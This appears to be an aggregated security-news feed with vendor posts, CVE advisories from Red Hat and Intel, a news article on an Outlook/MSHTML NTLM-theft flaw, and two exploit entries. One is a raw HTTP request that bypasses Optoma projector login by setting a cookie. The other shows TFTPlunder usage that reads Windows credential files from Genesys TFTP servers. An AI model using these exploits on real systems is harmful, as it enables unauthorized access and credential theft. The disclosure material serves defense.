Categories: Business
We blocked 100% of malware for the sixth consecutive quarter in a row.



(Read more...)




The post Malwarebytes achieves perfect score in latest AVLab assessment appeared first on Malwarebytes Labs.

Malwarebytes has once again earned a perfect score in AVLabs March 2023 real-world malware detection tests, marking the sixth consecutive quarter achieving this feat.

Let's delve into the details of the test and how both consumer and business products outperformed competitors in exhaustive testing.

**The AVLab Assessment**

AVLabs evaluation process is extensive and comprehensive, putting cybersecurity products through a rigorous series of real-world scenarios. The tests involve:

1.  **Malware Collection**: AVLab amasses a broad spectrum of malware samples from various sources, such as public feeds and custom honeypots. This ensures the test includes the most current and diverse set of threats.
2.  **System Log Analysis**: The collected malware samples undergo thorough scrutiny to confirm their malicious characteristics and their ability to successfully infect a Windows 10 system.
3.  **Real-life Cyber Attack Simulations**: All products are tested under the same conditions. AVLab recreates cyber attack scenarios akin to what's seen in the real world, using techniques that actual attackers employ.

Products that block all malware samples and achieve a maximum score of 100% protection are awarded an "Excellent" award badge.

**The Results**

Malwarebytes consistently excels in the tests, and March 2023 was no different. Both the consumer solution, Malwarebytes Premium and the business solution, Malwarebytes Endpoint Protection, earned “Excellent” badges for detecting and blocking 100% of malware.

The standout performance is largely due to our Multi-Vector Protection (MVP) technology, a unique approach that combines rules-based techniques with behavioral and AI-based methods to stop threats at every stage of an attack. MVP's proactive approach, which involves identifying threats even before they execute, played a crucial role in obtaining a perfect AVLab score. 

In addition, our web protection technologies, MWAC and BrowserGuard, blocked 89% of all threats, surpassing the average web protection blocking rate of 72% across all tested products.

For receiving the “Excellent award logo in every test during 2022 (testing is done 6x /year), Malwarebytes Premium received the following additional logo:

**The Competition**

Other vendors struggled to match Malwarebytes' results. BitDefender, for instance, missed five samples, while F-Secure and Microsoft Defender each missed four. BitDefender and Microsoft also missed samples in the January 2023 test, meaning both products failed to get 100% in back-to-back tests.

**The foundation for superior Endpoint Detection and Response (EDR)**

Malwarebytes Endpoint Protection (EP) is not merely a standalone product; it's the bedrock of our advanced Malwarebytes Endpoint Detection and Response (EDR) solution.

Leveraging the robust detection and prevention capabilities validated by AVLab's tests, Malwarebytes EDR delivers comprehensive visibility and granular control over network endpoints. Learn more about our endpoint security solutions.

For a deeper dive into our performance, view the full AVLab report here.

Malwarebytes achieves perfect score in latest AVLab assessment

Categories: News
Tags: Google passkey

Tags:  passkey

Tags:  passwordless future

Tags:  passwordless

Tags:  phishing

Google is offering users the best option to date to securing their accounts from phishing. (Hint: It's not passwords.)



(Read more...)




The post Google Passkeys: How to create one and when you shouldn't appeared first on Malwarebytes Labs.

Google has just brought users closer to a passwordless future.

In a recent blog post, the tech giant introduced the option to create and use a safer, more convenient alternative to passwords: Passkeys, a form of digital credential. So, how do they work?

Passkeys are generated using public-key cryptography, or asymmetric encryption, which involves using a pair of public and private keys. The public key is stored on the side of the app or website, while the private key, a main component of the passkey, is stored on the device. Websites have no access to the value of the passkey. When a Google user logs in to their account using a passkey, Google checks if the website has a corresponding public key.

This method of authentication makes accounts significantly more resilient, because, unlike a password, the key can't be phished, stolen from the website it's stored on, or intercepted in transit. It also means the account cannot be subject to an attack as a result of a weak password or password re-use, because there is no password.

As the authors of the blog put it:

> "Using passwords puts a lot of responsibility on users. Choosing strong passwords and remembering them across various accounts can be hard. In addition, even the most savvy users are often misled into giving them up during phishing attempts. 2SV (2FA/MFA) helps, but again puts strain on the user with additional, unwanted friction and still doesn’t fully protect against phishing attacks and targeted attacks like 'SIM swaps' for SMS verification. Passkeys help address all these issues."

The blog authors identified some benefits users could get out of using Google passkeys:

*   **Guaranteed access.** Suppose you created a passkey on a Google account you access with your smartphone. In that case, you can use this passkey to access that Google account on other devices like a laptop. Synchronizing the passkey to the device isn't needed as long as the phone is near the device and you approve the sign-in on your phone. If you create a passkey for your laptop—or for each device you own—you won't need your phone anymore to access your Google account.
*   "**Backup" key.** Some platforms securely back up your passkeys and sync them with other devices. For example, a passkey created on your iPhone will also be available on your other Apple devices if you're logged in to the same iCloud account. This prevents a user from getting locked out if they lose a device. Passkeys also make upgrading to a new device easier, as you only need to sync it with the rest of your devices.
*   **Phishing and breach protection.** Because passkeys cannot be stolen, phishers won't be able to get their hands on your account credentials. Similarly, passkeys cannot be reused or exposed in a data breach.
*   **It can replace physical security keys.** Google said that passkeys are "strong enough that they can stand in for security keys for users." A security key is a physical device used to sign in to your accounts. Like passkeys, it's another passwordless method of authentication. An example of a security key is YubiKey.

It's worth noting that passkeys use the three common types of information used in MFA: Something you have (like a smartphone), something you are (your biometrics), or something you know (like a PIN or pattern). This makes passkeys a form of MFA. However, according to the FIDO Alliance, some regulatory bodies have yet to make this recognition, something the alliance is already actively working towards.

**Minimum hardware and software requirements**

Google has listed what you'll need in order to create a passkey: Windows 10 or macOS Ventura (or later) running Chrome 109, Safari 16, or Edge 109 (or later), or iOS16 or Android 9 (or later) on a mobile device.

You also need to enable screen lock, especially Bluetooth, if you want to use passkeys on the phone to sign in to another device.

**When you _shouldn't_ create a passkey**

Passkeys should only be created on devices you personally control. That said, you shouldn't make a passkey using a Google Workspace account through a school or employer. You also shouldn't create one on devices you share with other people, like your family computer, as anyone using the device will have access to your Google account. Even if you sign out of your account, once a passkey is created on that device, anyone who can unlock the device can sign in back into your account with the passkey.

**How to create a passkey in two simple steps**

I used an iOS device here.

1\. Go to g.co/passkeys to trigger the process.

You can also log in to your Google account. From the **Home** page, go to **Security**. Scroll down to **How you sign in to Google** and pick **Passkeys** as an added sign-in option. You'll land on the same page as above.

2\. Click **Create a passkey**. An overlay will display, confirming that you can create a passkey on the device. Click **Continue**.

Note: If you have your **iCloud Keychain** disabled, your device will prompt you to enable it.

And you're done!

The first time you sign in, the computer displays a QR code you can scan with your mobile device's camera. Once signed in, you may be prompted to create a passkey for the computer. As we've said, only agree if you don't share the computer with anyone.

If in the future, you decide to stop using passkeys, Google gives you the option to remove them. You can also opt out of using passkeys entirely. In cases when devices have been lost or stolen, or the passkey goes missing or unavailable, you can check Google's recommendations on this Account Help page.

Google isn't the only company that has been working on an alternative to passwords. Apple and Microsoft have also announced they'll support passkeys on their respective platforms to address password problems. 

Watch this space!

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Google Passkeys: How to create one and when you shouldn't

Optoma 1080PSTX with firmware C02 suffers from an authentication bypass vulnerability.

    # Exploit Title: Optoma 1080PSTX Firmware C02 - Auth Bypass# Date: 2023/05/09# Exploit Author: Anthony Cole# Contact: http://twitter.com/acole76# Website: http://twitter.com/acole76# Vendor Homepage: http://optoma.com# Version: Optoma 1080PSTX Firmware C02# Tested on: N/A# CVE : CVE-2023-27823DetailsBy default the web interface of the 1080PSTX requires a username and password to access the application control panel.  However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1".GET /index.asp HTTP/1.1Host: projectorCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: atop=1Connection: close

Optoma 1080PSTX Firmware C02 Authentication Bypass

Red Hat Security Advisory 2023-1372-01 - Red Hat OpenShift support for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift support for Windows Containers 8.0.0 [security update]  
Advisory ID:       RHSA-2023:1372-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1372  
Issue date:        2023-05-10  
CVE Names:         CVE-2022-41717 CVE-2023-25173   
=====================================================================

1. Summary:

The components for Red Hat OpenShift support for Windows Containers 8.0.0  
are now available. This product release includes bug fixes and a moderate  
security  
update for the following packages: windows-machine-config-operator and  
windows-machine-config-operator-bundle.  
Red Hat Product Security has rated this update as having a security impact  
of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE  
link(s) in the References section.

2. Description:

Red Hat OpenShift support for Windows Containers allows you to deploy  
Windows container workloads running on Windows Server containers.

Security Fix(es):

* golang: An attacker can cause excessive memory growth in a Go server  
accepting HTTP/2 requests (CVE-2022-41717)  
* containerd: Supplementary groups are not set up properly (CVE-2023-25173)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section

3. Solution:

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2161274 - CVE-2022-41717 golang: net/http: excessive memory growth in a Go server accepting HTTP/2 requests  
2174485 - CVE-2023-25173 containerd: Supplementary groups are not set up properly

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-10416 - Case sensitivity issue when label "openshift.io/cluster-monitoring" set to 'True' on openshift-windows-machine-config-operator namespace  
OCPBUGS-10709 - BYOH upgrade failed Unable to cleanup the Windows instance: error running powershell.exe -NonInteractive -ExecutionPolicy Bypass \"C:\\k\\windows-instance-config-daemon.exe cleanup -  
OCPBUGS-10930 - Windows pods are unable to resolve DNS records for services  
OCPBUGS-11444 - BYOH node upgrade failed when the node not in default namespace: deleting node winhost\nF0402 08:53:43.066039    4740 cleanup.go:56] nodes \"winhost\" is forbidden: User \"system:serviceaccount:winc-namespace-test:windows-instance-config-daemon\"  
OCPBUGS-11735 - oc adm node-logs failing in vSphere CI  
OCPBUGS-1513 - Check if Windows defender is running doesnt work  
OCPBUGS-2028 - [WINC] Windows nodes name not matching hostname in GCP  
OCPBUGS-3506 - Load balancer shows connectivity outage during Windows nodes upgrade  
OCPBUGS-4133 - Load Balance service with externalTrafficPolicy="Cluster" for Windows workloads intermittently unavailable in GCP and Azure  
OCPBUGS-5065 - Installation of WMCO in different namespace fails  
OCPBUGS-5354 - WMCO is unable to drain DaemonSet workloads  
OCPBUGS-5378 - containerd version is being misreported  
OCPBUGS-5732 - Windows nodes do not get drained (deconfigure) during the upgrade process  
OCPBUGS-5887 - Directory deletion errors are being ignored when deconfiguring Windows instances  
OCPBUGS-6611 - Hybrid Overlay logfile is in use and cannot be deleted  
OCPBUGS-6635 - WMCO kubelet version not matching OCP payload's one  
OCPBUGS-7287 - Kublet logs are not written to the kubelet log file  
WINC-1001 - Use standard library errors package  
WINC-1014 - Enable in-tree storage for vSphere for 4.13  
WINC-733 - Instance cleanup is done by WICD cleanup command  
WINC-736 - WICD controller periodically reconciles the state of Windows services   
WINC-741 - WICD takes more responsibility of Node configuration  
WINC-838 - Use PodOS field in e2e tests, and document it for users  
WINC-898 - Containerd is added to windows-services configmap  
WINC-923 - Update pause image to 3.9  
WINC-942 - OpenShift Branching Day release-4.13 / WMCO 8.0.0  
WINC-959 - update GitHub build and testing docs   
WINC-962 - Pick up openshift/kubernetes 1.26 rebase updates  
WINC-977 - Update kube-proxy submodule to sdn-4.13-kubernetes-1.26.0

6. References:

https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2023-25173  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFsxWdzjgjWX9erEAQhHXA/6AhWeuT89b6OpYzOBwz10B+PDTwCwkzYy  
kGoc5p8Wu7ov2liOTBYBwPZVrAN73T6O+FAIPzeYi0Ip8m2KBa7AThuDMcBsv8kC  
5jj8lD8JzZLq1IPhOtnIuDBUkBGKwadcPwu+tH+L7QHLeaAVg5ceRE/55tcTEAM6  
nYkkbrcWwpbU1PKo6PmGAW80phPCb+YvmQh3w10t8o/AqHry4g+6r5VvwqoB2YEB  
b7fXDESPuOYVRF+7A+uh4kL0wA93OW9TMMW61H147gmoJTHxKGZ6Ts6IVQn7+dkl  
cZ5xHfpxuMP2YbBqh05kx3D1SP2EmTGlYr/xjoyzFS4MWQvb667kESb6MrBP9Jl2  
y2EJkZw/aUAouwy6kOexfAf3gnJl+9s0McYJHVO4TC+LvPpmcE4T5G3YK1r9dnFf  
fZQMLwoiNQZWXk/hLh96Lmk+H9bIXHMuL7OCiRDlYHaiDXjZQG83w5aPt733DCJ8  
sP44DLRmP3WkNvz9BENHn1wgQ/ihGlmuEa2GsV51pHEMpvAHlRmb5XwFJ4RLLB9O  
3vOzxH1XwCPK0lc1k2af4nO9ezHChsjHve86iEYFFrvdKFO0JgmigzqNpc/eEkHC  
LPqktATWXARi4qcn+JHEV7d40eAHYgZYv5AA4VHpomHK92WDK7EF6YOvMREwB/K/  
dbxljBPzQIg=  
=qVSk  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1372-01

An issue was found in Genesys CIC Polycom phone provisioning TFTP Server all version allows a remote attacker to execute arbitrary code via the login crednetials to the TFTP server configuration page.

**TFTPlunder: an exploit for CVE-2023-29930**

This is an exploit script for a blind file read / write vulnerability in the Genesys (formerly InIn) TFTP provisioning server.

**Vulnerability info**

This vulnerability is due to unrestricted configuration options for the TFTP root path and file extensions. In other words, from the Admin interface, you can change the TFTP to any directory at all and upload or download whatever files you want.

(Note however that TFTP as a protocol does not allow for file listing, which is what makes this a _Blind_ file read vulnerability.)

It is particularly compounded by the fact that the server by default uses hardcoded known credentials and does not force the user to change them.

Classification-wise, it has aspects of the following CWEs:

*   CWE-22: Improper Limitation of a Pathname to a Restricted Directory
*   CWE-434: Unrestricted Upload of File with Dangerous Type
*   CWE-522: Insufficiently Protected Credentials

All known versions to date are vulnerable.

**Mitigation**

The best mitigation for now is simply to update the Admin credentials to the TFTP configuration server.

**Using this exploit**

I'd recommend using this with either a Jupyer notebook or the Python REPL loop, or for more advanced use cases, writing your own script and importing this file. Just import the main python file, instantiate the class, and call get\_file and put\_file as you please.

    $ python3
    >>> from tftplunder import TFTPlunder
    >>> tp=TFTPlunder("example.com")
    >>> tp.get_file("C:/Windows/Panther/Unattended.xml")
    >>> tp.get_file("C:/ProgramData/ntuser.pol")
    
    

etcetera

hint: see https://github.com/jtpereyda/regpol for help decoding ntuser.pol

and see lists such as https://github.com/soffensive/windowsblindread/blob/master/windows-files.txt for examples of other files to try.

CVE-2023-29930: GitHub - YSaxon/TFTPlunder: Exploit for CVE-2023-29930: blind file read/write in Genesys TFTP provisioning server configuration

Cybersecurity researchers have shared details about a now-patched security flaw in Windows MSHTML platform that could be abused to bypass integrity protections on targeted machines.
The vulnerability, tracked as CVE-2023-29324 (CVSS score: 6.5), has been described as a security feature bypass. It was addressed by Microsoft as part of its Patch Tuesday updates for May 2023.
Akamai security

Cybersecurity researchers have shared details about a now-patched security flaw in Windows MSHTML platform that could be abused to bypass integrity protections on targeted machines.

The vulnerability, tracked as CVE-2023-29324 (CVSS score: 6.5), has been described as a security feature bypass. It was addressed by Microsoft as part of its Patch Tuesday updates for May 2023.

Akamai security researcher Ben Barnea, who discovered and reported the bug, noted that all Windows versions are affected, but pointed out Microsoft, Exchange

servers with the March update omit the vulnerable feature.

"An unauthenticated attacker on the internet could use the vulnerability to coerce an Outlook client to connect to an attacker-controlled server," Barnea said in a report shared with The Hacker News.

"This results in NTLM credentials theft. It is a zero-click vulnerability, meaning it can be triggered with no user interaction."

It's also worth noting that CVE-2023-29324 is a bypass for a fix Microsoft put in place in March 2023 to resolve CVE-2023-23397, a critical privilege escalation flaw in Outlook that the company said has been exploited by Russian threat actors in attacks aimed at European entities since April 2022.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

Akamai said the issue stems from complex handling of paths in Windows, thereby allowing a threat actor to craft a malicious URL that can sidestep internet security zone checks.

"This vulnerability is yet another example of patch scrutinizing leading to new vulnerabilities and bypasses," Barnea said. "It is a zero-click media parsing attack surface that could potentially contain critical memory corruption vulnerabilities."

In order to stay fully protected, Microsoft is further recommending users to install Internet Explorer Cumulative updates to address vulnerabilities in the MSHTML platform and scripting engine.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Experts Detail New Zero-Click Windows Vulnerability for NTLM Credential Theft

Incorrect permission assignment for critical resource in some Intel(R) QAT drivers for Windows before version 1.9.0 may allow an authenticated user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® QAT Advisory**

Intel ID:

INTEL-SA-00778

Advisory Category:

Software

Impact of vulnerability:

Escalation of Privilege, Information Disclosure

Severity rating:

HIGH

Original release:

05/09/2023

Last revised:

05/09/2023

**Summary:**

Potential security vulnerabilities in some Intel® QuickAssist Technology (QAT) drivers for Windows may allow escalation of privilege or information disclosure. Intel is releasing software updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-41699

Description: Incorrect permission assignment for critical resource in some Intel(R) QAT drivers for Windows before version 1.9.0 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

  
CVEID: CVE-2022-40972

Description: Improper access control in some Intel(R) QAT drivers for Windows before version 1.9.0 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

Description: Incorrect permission assignment for critical resource in some Intel(R) QAT drivers for Windows before version 1.9.0 may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 6.5 Medium

Description: Improper access control in some Intel(R) QAT drivers for Windows before version 1.9.0 may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 3.3 Low

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

**Affected Products:**

Intel® QAT drivers for Windows before version 1.9.0.

**Recommendations:**

Intel recommends updating Intel® QAT drivers for Windows to version 1.9.0 or later.

Updates are available for download at this location:

https://www.intel.com/content/www/us/en/download/19732

**Acknowledgements:**

Intel would like to thank Aobo Wang of Chaitin Security Research Lab (CVE-2022-41771, CVE-2022-41699, CVE-2022-41621) and Falcon Corruption @falconCorrup (CVE-2022-40972) for reporting these issues.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

05/09/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

© Intel Corporation.  Intel, the Intel logo, and other Intel marks are trademarks of Intel Corporation or its subsidiaries United States and other countries.  Other names and brands may be claimed as the property of others.

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-41771: INTEL-SA-00778

Incorrect default permissions in the software installer for Intel(R) Unite(R) Client software for Windows before version 4.2.34870 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Unite® Client Software Advisory**

**Summary: **

A potential security vulnerability in the Intel® Unite® Client software for Windows may allow escalation of privilege. Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-33963

Description: Incorrect default permissions in the software installer for Intel(R) Unite(R) Client software for Windows before version 4.2.34870 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

**Affected Products:**

Intel® Unite® Client software for Windows before version 4.2.34870.

**Recommendations:**

Intel recommends updating the Intel® Unite® Client software for Windows to version 4.2.34870 or later.

Updates are available for download at these locations:

https://www.intel.com/content/www/us/en/download/18371/intel-unite-app.html

**Acknowledgements:**

Intel would like to thank Amin saidani for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

05/09/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

© Intel Corporation.  Intel, the Intel logo, and other Intel marks are trademarks of Intel Corporation or its subsidiaries United States and other countries.  Other names and brands may be claimed as the property of others.

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-33963: INTEL-SA-00782

Out-of-bounds read in software for the Intel QAT Driver for Windows before version 1.9.0-0008 may allow an authenticated user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® QAT Driver Advisory**

Intel ID:

INTEL-SA-00809

Advisory Category:

Software

Impact of vulnerability:

Escalation of Privilege, Denial of Service, Information Disclosure

Severity rating:

HIGH

Original release:

05/09/2023

Last revised:

05/09/2023

**Summary: **

Potential security vulnerabilities in some Intel® QuickAssist Technology (QAT) drivers may allow escalation of privilege, information disclosure or denial of service. Intel is releasing software updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-21804

Description: Out-of-bounds write in software for the Intel® QAT Driver for Windows before version 1.9.0-0008 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.4 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H

CVEID: CVE-2022-21239

Description: Out-of-bounds read in software for the Intel® QAT Driver for Windows before version 1.9.0-0008 may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 5.6 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2022-41808

Description: Improper buffer restriction in software for the Intel® QAT Driver for Linux before version 1.7.l.4.12 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 3.3 Low

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

**Affected Products:**

**Windows:**

The Intel® QAT Driver for Windows before version 1.9.0-0008.

**Linux:**

The Intel® QAT Driver for Linux before version 1.7.l.4.12.

**Recommendations:**

**Windows:**

Intel recommends updating Intel® QAT Driver for Windows to version 1.9.0-0008 or later.

Updates are available for download at this location:

https://www.intel.com/content/www/us/en/download/19732

**Linux:**

Intel recommends updating Intel® QAT Driver for Linux to version 1.7.l.4.12 or later.

Updates are available for download at this location:

https://01.org/sites/default/files/downloads/qat1.7.l.4.12.0-00011.tar.gz

**Acknowledgements:**

Intel would like to thank Zimi of Alibaba Orion Security Lab (CVE-2022-21804 and CVE-2022-21229) for reporting these issues.

The following issue (CVE-2022-41808) was found internally by an Intel employee.  Intel would like to thank Lukasz Odzioba.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

05/09/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

© Intel Corporation.  Intel, the Intel logo, and other Intel marks are trademarks of Intel Corporation or its subsidiaries United States and other countries.  Other names and brands may be claimed as the property of others.

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-21239: INTEL-SA-00809

Uncontrolled search path in some Intel(R) NUC Chaco Canyon BIOS update software before version iFlashV Windows 5.13.00.2105 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® NUC BIOS Update Software Advisory**

**Summary: **

A potential security vulnerability in some Intel® NUC Chaco Canyon BIOS update software may allow escalation of privilege. Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

